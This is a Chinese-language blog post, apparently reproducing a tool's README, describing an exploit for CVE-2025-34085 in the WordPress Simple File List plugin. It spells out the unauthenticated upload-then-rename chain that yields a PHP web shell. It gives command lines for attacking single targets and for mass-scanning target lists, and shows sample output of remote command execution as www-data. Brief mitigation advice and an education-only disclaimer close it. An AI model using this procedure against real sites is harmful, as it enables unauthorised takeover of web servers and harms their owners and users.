Featured image of post WordPress Simple File List 未授权远程代码执行漏洞利用指南

WordPress Simple File List 未授权远程代码执行漏洞利用指南

本文详细介绍了CVE-2025-34085漏洞的利用方法,这是一个WordPress Simple File List插件中的严重安全漏洞,允许攻击者通过未授权文件上传和重命名功能实现远程代码执行。

CVE-2025-34085 — WordPress Simple File List 未授权RCE漏洞利用

针对CVE-2025-34085的自动化漏洞利用和扫描工具,这是一个WordPress Simple File List插件中的严重漏洞,通过任意文件上传和重命名功能实现未授权远程代码执行


📄 CVE 摘要

  • CVE ID: CVE-2025-34085
  • 受影响组件: WordPress插件 — Simple File List
  • 漏洞类型: 未授权文件上传和文件重命名为可执行文件
  • 影响: 远程代码执行 (RCE)
  • 漏洞利用作者: 0xgh057r3c0n
  • 访问向量: 远程、未授权

⚙️ 漏洞利用流程

  1. 未授权文件上传

    • 将恶意文件上传到:
      /wp-content/plugins/simple-file-list/ee-upload-engine.php
  2. 重命名为PHP扩展名

    • 通过以下路径将上传的文件重命名为.php或类似扩展名:
      /wp-content/plugins/simple-file-list/ee-file-engine.php
  3. 执行载荷

    • 通过访问重命名的Web shell执行任意命令。

🚀 使用方法

📌 单个目标

1
python3 CVE-2025-34085.py -u http://target.com --cmd "id"

📄 多个目标

将目标URL放入targets.txt(每行一个),然后运行:

1
python3 CVE-2025-34085.py --cmd "whoami"

🔧 命令行选项

参数 描述
-u 目标URL(例如:http://example.com
--cmd 在远程shell上执行的命令(默认:id
--inline 使用内联载荷(无?cmd=参数)

✅ 示例输出

1
2
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功的目标将保存到vuln.txt


📁 文件

  • CVE-2025-34085.py — 主漏洞利用脚本
  • targets.txt — (可选)目标域名列表
  • vuln.txt — 成功利用的记录

🛡️ 缓解措施

管理员应:

  • 将插件更新到最新的安全版本。
  • 限制对上传和重命名端点的公共访问。
  • 监控上传内容中的意外PHP文件。
  • 部署WAF或端点保护系统。

📘 免责声明

本项目仅用于教育和授权测试目的。 作者对因滥用此工具造成的任何损害不承担任何责任


📄 许可证

本项目采用MIT许可证。 📄 查看完整许可证文本


👨‍💻 作者

0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n


comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计